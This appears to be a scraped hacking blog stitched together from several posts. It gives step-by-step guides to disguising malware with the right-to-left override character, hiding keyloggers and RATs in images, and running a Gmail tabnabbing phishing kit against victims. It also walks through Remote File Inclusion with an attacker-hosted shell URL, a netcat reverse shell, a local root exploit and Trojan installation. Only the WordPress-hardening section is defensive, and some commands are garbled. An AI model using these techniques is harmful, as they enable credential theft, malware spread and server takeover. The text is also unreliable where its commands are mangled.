Hack Websites Database Using XPath Injection

Everyday many website gets hacked by hackers but most of the hackers are hacking those website just for popularity nothing else. Today i am writing this tutorial on XPath Injection, in which i will explain you, How Hackers Hack Website Using XPath Injection.

In a typical Web Application architecture, all data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input.

Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases.

You might be interested in some of our other articles:

• Istealer Tutorial : Password Stealer To Hack Twitter
• How To Hide Keylogger, Virus, Rats Files in Image
• Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
• Remote Password Hacking Software - Sniperspy keylogger
• How To Hack Password Through Mobile

Don’t forget to Subscribe to our RSS feed

XPath Injection Tutorial To Hack Websites Database

File Extension Changing Tutorial! Make .exe Look Like a jpeg, mp3 or Whatever You Like!

Hello Guys..On wildhacker I have written about Keylogger and Crypter in my previous articles. Today in this tutorial I will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable!

So for example lets say, you have created a file server.exe using keylogger, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end.

You might be interested in some of our other articles:

• SMS Hack : Send Sms From Friends MobileTo Any Number
• How To Hack and Crack IDM
• Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
• Remote Password Hacking Software - Sniperspy keylogger
• How To Hack Password Through Mobile

Don’t forget to Subscribe to our RSS feed

How To Change File Extension

Follow the steps bellow to change the file extension..

Step 1: lets say we have server.exe, now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).

Step 2: Now it's time to use the exploit! Open up the Character Map,

Step 3: Scroll down and find the "U+202E: Right-To-Left Override" character in Character Map,

Click "Select" and then "Copy".

Step 4: Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste)

Step 5: Then type "3pm" (without the " ") and press Enter. Now it should look like this:
Spoiler,

Done! Obviously you might want to change the icon to look like an mp3 before doing this..

Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.

Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations!

So friends, I hope this file extension changing tutorial will be useful for you. If you have any problem in this file extension changing tutorial, please mention it in comments bellow.

Enjoy HaCkInG.........

How to Protect WordPress Website From Hackers

After some Website Hacking articles, i am adding one more article in this category which is based WordPress website security. Now days WordPress is one of the most popular platform for many bloggers and every day, thousands of new people are using WordPress. WordPress also provides powerful Content Management Systems (CMS). Because of this popularity, more hackers are targeting WordPress and looking for vulnerabilities within the software.

Today in this article i am going to share some important tips to secure WordPress website from hackers, So you can keep your focus on blogging instead of website security hacked.

Since there are no such software, like an Anti-Virus, available to secure a website. Most of the people just consider the job is done once they setup the website. It definitely is not. You can protect a website or webserver only by continued efforts.

You might be interested in some of our other articles:

• How To Unlock BlackBerry Cell Phones
• Email Password stealer to hack find password of email account
• Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
• Remote Password Hacking Software - Sniperspy keylogger
• How To Hack Password Through Mobile

Don’t forget to Subscribe to our RSS feed

How to Protect WordPress Blog/Website From Hackers

Follow the following steps in order to protect WordPress Website / Blog.

1) Use Open Source Scripts :

Unless you know what you are doing or have a well versed development team in your payroll, it is a great idea to use open source scripts. Open source scripts like WordPress, Drupal, Joomla, Magento etc. are feature rich, powerful and are backed by thousands of coders for update & support.

This avoids websites falling prey to hackers & spammers due to poorly written code. Instead of building from scratch, you can use the existing scripts and modify them to your liking. Commercial scripts from reputed companies can also be deployed if they issue updates & patches regularly.

2) Use Strong Passwords :

Passwords like “wildlove0123”, “unwildlover” are definitely not good. Your password does not have to reflect your “inner persona” as they are supposed to keep things safe.

Use a combination of numbers, special characters and alphabets and make sure they are atleast 10 characters long. Apps like KeePass, Lastpass etc. can help you generate strong passwords and to store them as well.

3) Update Constantly :

Upgrade to newer versions of scripts or add new features as soon as they are released. Main intension of Upgradation is to fix bugs in the script and are as important as a full version upgrade.

5) Secure Admin Email Address :

Keep the admin email address used to login to your webserver, CMS, database etc. away from the public eye, dont share such email address on website or in forum / social networking site. Use a totally different address in your contact page. This will help from not being scammed by a phising email disguised to have been sent by your hosting company or domain registrar.

6) Add a Database Table Prefix :

If you are using a CMS, blog or forum script, change the default database table prefix. For example in case of WordPress, the default database table prefix is “wp”. So if a brilliant hacker finds a way to extract data from a database, default table prefixes will leave you a sitting duck.

7) Password protect the Database :

It is not a mandatory requirement in a lot of scripts to enter a database password and leaving them empty will still get the script installed. An empty password is a criminal waste of an additional layer of security. Database password do not slow down the website when querying the database, so there is absolutely no reason not to have one.

8) Delete the Installation Folder :

Once the installation is done there is no use for the installer folder in the day to day operations of a website. It is very much possible for a hacker to run the installer once again, empty the database and take control of the website & its content. Ideally it is strongly advised to delete the folder once the installation is complete, but if you know your way around the web server, you can also opt to rename the folder.

9) Change File & Folder Permissions :

Some scripts require full read & write access while installation. This can achieved by using the 777 code on vital folders like config, admin etc. Revert the file permissions back to their original code, say 755 or 644. A file or folder with full read write code gives easy access to inject malicious code in your website.

10) Use Secured FTP Access :

If your webserver or ISP support SFTP access, jump at the opportunity and upload files to your server in fully encrypted glory. Nobody can sniff what you are uploading or downloading to & from the webserver.

11) Restrict Root Access :

Be it may FTP or Database, never give root access to everyone willy nilly. Restrict access to certain non system folders in the case of FTP uploads by people other than the system administrator.

12) Ensure the presence of .htaccess file :

.htaccess files are often used to specify the security restrictions for the particular directory, and make sure you have not deleted it by accident or if it is there in the first place.

13) Add robots.txt file :

robots.txt gives special instructions to search engine spiders as to which folders are to be indexed and which ones are not. Folders with documents, images etc can be kept under wraps from being indexed and displayed in public web searches.

14) Use security plugins :

Mature platforms always have plugins to extend the core functionality of the script. Look for plugins that add an extra layer of security and install them. For example, WP Security Scan plugin checks if most of the steps I have mentioned above have been implemented properly in a WordPress installation.

15) Read leading Tech Blogs :

Keep yourself updated on the latest vulnerabilities, bugs and attacks on the Internet. There will be a time delay before the patches are issued and this information will help you protect your website or to temporarily take it offline if there is a very serious threat. Wired’s Threat Level and Kreb’s on Security are good places to begin.

16) Stay away from Nulled Scripts & Themes :

Piracy of commercial scripts and paid themes is the easiest among all other forms of piracy. Smaller file sizes, absence of version specific keygen, cumbersome Daemons, DLL patches & cracks make it a cake walk to pirate a script rather than a software or PC Game.

However, unlike pirated desktop software where a hidden malware is removed by the Anti Virus software, there is no way you can escape the backdoor added to the codebase. Even for a seasoned programmer, it is impossible to go through thousands of lines of code to check if the script is free of backboors.

A nulled script or theme with a backdoor ensures that the hacker peddling it in the first place has gotten himself a free server to spam people with mails promising to enhance things that cannot be enhanced. If you are lucky, your website might not used for anti government propaganda or for distributing child pornography. Unless you so love orange jumpsuits or better yet, would love to go on an all expenses paid trip to a certain facility in Cuba, stay away from nulled scripts. Nulled scripts hurt the pirate worse than the developer. Enough said.

When it comes to security online, there are always infinite number of ways to protect a website. Share with us the tips & tricks you use to protect your website by leaving a comment.

Credits go to Justin Stravarius.

Happy hacking.........

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

There are many ways we hide our data in computer some people use encryption tools like Truecrypt, some hide there files in folders , some use folder lock etc.

Steganography is the art and science of hiding messages, Images, Data .etc in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, In following tutorial i will show you how you can Hide Data Behind Images.

In this article I am sharing software which will helps you to hide RAR files in a working jpg file!

You might be interested in some of our other articles:

• Hack Website : Basic Information About Website Hacking Part 1
• Crack RAR Password : How To Crack RAR File Passwords
• Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
• Remote Password Hacking Software - Sniperspy keylogger
• How To Hack Password Through Mobile

Don’t forget to Subscribe to our RSS feed

How To Hide Keylogger, Virus, Rats Files in Image - Steganography

Follow the following steps to hide data behind the image using software.....

Step 1: Download Hide RAR Software to hide RAR file behind the image.
             Password : www.wildhacker.com

Step 2: Run the software file rarhide to see,

Step 3: Now select the images in which you want to hide RAR file,

Step 4: After that select RAR file which you wants to hide in the image,

Step 5: Finally click on "Combine" button and select location where you wants to save the file which contain hidden RAR file in image.

Note: To check whether it work or not, just open the file which you made in final step with winrar or change the extension to .rar.

That's it friends. We are successful to hide Keylogger, virus files in a jpeg image. I have tried my best to be as simple as possible to help you hide virus. If you find any problem in this tutorial on how to hide virus in jpeg image, please mention it in comments.

Enjoy n hide virus, keylogger files in image...

How to Hack Gmail Account Password Using Tabnabbing Jan 2012

Hello Friends, in my previous article we discussed on TABNABBING today i am going to explain you How To Hack Gmail Account Password using Tabnabbing method.

Tabnabbing is a modern type of phishing method used to hack websites passwords. As we all know normal Phishing attack is easily detectable on many site such as Facebook,Gmail, yahoo etc.

Like Facebook has implemented an extra code that validates the previous arriving URL and some basic functions. If it founds that page from which you arrived is a Facebook Phish or fake page, it displays a warning message to user that You have been arrived from fraudulent or fake page. So please change you Facebook account password immediately. So Victim easily came to know that was made fool by someone and he changes his account password again.

For more information about Tabnabbing and how to How to protect yourself from Tabnabbing click here

You might be interested in some of our other articles:

• Complete HACKING information for Newbies
• 25+ free Rapidshare, Megaupload, Filesonic Premium..
• HACKING MYSPACE,FACEBOOK,GMAIL,YAHOO ACCOUNT PASSWORDS BY WINSPY KEYLOGGER
• REMOTE PASSWORD HACKING SOFTWARE - SNIPERSPY
• HOW TO SPY / SCAN / HACK A CELLPHONE WITH MOBILE SPY

Don’t forget to Subscribe to our RSS feed

Hack Gmail Account Password Using Tabnabbing Jan 2012

1. Free Download Gmail Tabnabbing to hack Gmail Account Password.
    Password: www.wildhacker.com

2. Extract the folder "gmail tabnabbing-fake page"

3. Now, to any anonymous webhost (any u like), upload this all the files which are in Auto Tab Nabbing folder. You can use my3gb.com, 110mb.com or freewebhost.com or t35.com for this as they are free.

4. After successfull upload, Check whether the hack is working, click on the index.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake gmail login (login.html) page.

5. To make url (name.webhost.com/index.html) short read this article "How To Hide a Url | Change Url | Mask Url".

6. Now read this Article about Fake Mailer : How To Send Anonymous Email

7. Now, send index.html page to victim inbox of which u want to hack Gmail account password.

8. When, he will login with this Gmail phisher to his Gmail account, a new file "password.html" will be created which will contain gmail hacked password in plain text form and he will be redirected to Facebook.com/careers page to avoid suspecion.

Update: If you want to hack facebook and other email account passwords, please use the best Hacking Software- Winspy Keylogger which is FUD (Fully UnDetectable). This is personally recommeded keylogger from wildhacker.

Thus, now you can
hack Gmail account passwords
using this Gmail hacking new technique Tabnabbing. If you have any problem in using this Gmail Tabnabbing/Phisher to hack Gmail account password, mention it in comments section.

Enjoy Gmail Hacking using Tabnabbing .....

Hack Website : Remote File Inclusion Tutorial For Website Hacking Part 5

As we all know,On WildHacker we have discussed various website hacking tutorials - How to find a vulnerable Website? , Basic information of website hacking, XSS Tutorial and (CSRF/XSRF). Today i am writing this one more 5th article on website hacking using Remote File Inclusion (RFI). In this article I will be showing you how to perform an RFI or Remote File Inclusion attack. This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.

A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.

To perform Remote File Inclusion will require :

• A Vulnerable site
• A site with PHP enabled

       ....................................................................................just read on.

You might be interested in some of our other articles:

• CEH Training CBT Boot Camp - Certified Ethical Hacker (CEH v7.1) Full
• SMS HACK : Send Sms from Friends Mobile To Any Number
• Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
• Remote Password Hacking Software - Sniperspy keylogger
• How To Hack Password Through Mobile

Don’t forget to Subscribe to our RSS feed

Remote File Inclusion Tutorial For Website Hacking

What is RFI?

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

• Code execution on the web server
• Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
• Denial of Service (DoS)
• Data Theft/Manipulation

RFI is a very uncommon vulnerability due to excessive patches and updates on websites.

What makes a page vulnerable?
A PHP include script looks like this.

Code:

<?php
include($_GET['p']
?>

Since the code uses 'p' the syntax would be:

Code:

http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?

If the script looks like this:

Code:

<?php
include($_GET['lulz']);
?>

The syntax would then be:

Code:

http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Well, first, we need to obtain a website with a vulnerability. If you are to lazy to look around here is a google dork you can use to find a vulnerable site:
Also you can use exploit scanners for find RFI Vulnerable site.

Here is a list of some RFI dorks:

inurl:"index.php?page=contact.php"
inurl:"template.php?goto="
inurl:"video.php?content="
inurl:"pages.php?page="
inurl:"index1.php?choix="

For More Dorks Click Here To Download RFI Dork List File

We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.

Code:

http://victimsite.com/index.php?p=interview.php

As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting :

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

Code:

http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.

Code:

http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?

Note : The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".

What this will do is go under the site as a php format. Because if you look closly at index.PHP, you can see that php is the format, so when we tell the website we want to go to: http://yoursite.com/shell.txt it will mistake it as a php file and retrieve us the data.

Once you got your shell on, you can do many things. You can find config.php to get access to mysql, you can get root, etc.

But, we will be focusing on gaining root.

We will need to back connect, to be able to do this, you need to meet two requirements:

• Port forward the port you want to connect to.
• You will need netcat

Since most shells are sort of screwed on the back connecting part, you can use bc.pl to do a nice back connect.

Back Connect:

Code:

http://pastie.org/396949

Some shells however don't, such as: Locus7Shell, Storm7Shell, GnY shell and some more...

Save as bc.pl then you will need to execute the perl script (bc.pl) to the server itself.

If you want to do this via back connection on shell, then open netcat, type in:

Code:

nc -l -n v- p PORT

You need to insert the port you forwarded, for example:

Code:

nc -l -n -v -p 1337

Press enter, and then it will start listening to the port then go back to the shell and submit the back connection
then once you go back to netcat your ready.

Type:

Code:

whoami

As you can see you do not have root.

Now we need to type uname -a to find out what type of linux box they are running.

It may look something like this:

Code:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686

Now look, 2.6.17 is vuln to vmsplice :)

We can add our local root exploit two ways, we can do it via netcat, or we can do it via shell.

now we need to compile it, we can use gcc (compiling command) to do this. Here is how it will look like:

Code:

gcc 5092 -o exploit

What that does is compile 5092 (our Local Root Exploit) and uses -o (which means to open it via exploit)

Or we can do this via shell:

Find your Local Root Exploit for this box, save it as .c go to your shell and upload it.

After uploaded go back to netcat and type in:

Code:

gcc localrootexploit.c -o getr00t

change localrootexploit.c to your exploits name and leave getr00t as what it is named.

Now press enter.

Method #1 (execute Local Root Exploit)
./exploit

Method #2 (execute Local Root Exploit)
./getr00t

Now type in:

Code:

whoami

And if root appears you have successfully rooted this box.

Part 2

If this box you owned is running a Windows NT box or something familiar, we can "Install a Trojan" on them.

To do this you should see a tab somewhere in the shell where it say says "Backdoor host" or something familiar. If not, try a better shell.

Choose a Trojan you like, from my experience I use:
beast v2.07

Install it then it says its ready. Install beast v2.07 client then insert the IP and port it gave you. Then connect.

You need to remember that some Windows Boxes have firewall protection, but since this is winblows there is usually a backup of the desktop and C:\ meaning you can find the firewall and delete a needed file and then it won't execute correctly then, you got yourself some win.

This is exactly why you never run a Windows box on your server.

If you like you can crash this box using a winpopup message. This is easy to do from unix using smbclient -U Lotsofshit -M host.

So friends, I hope you will like this
Remote File Inclusion Tutorial....
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using Remote File Inclusion Tutorial, please mention it in comments section.

Enjoy Website Hacking ........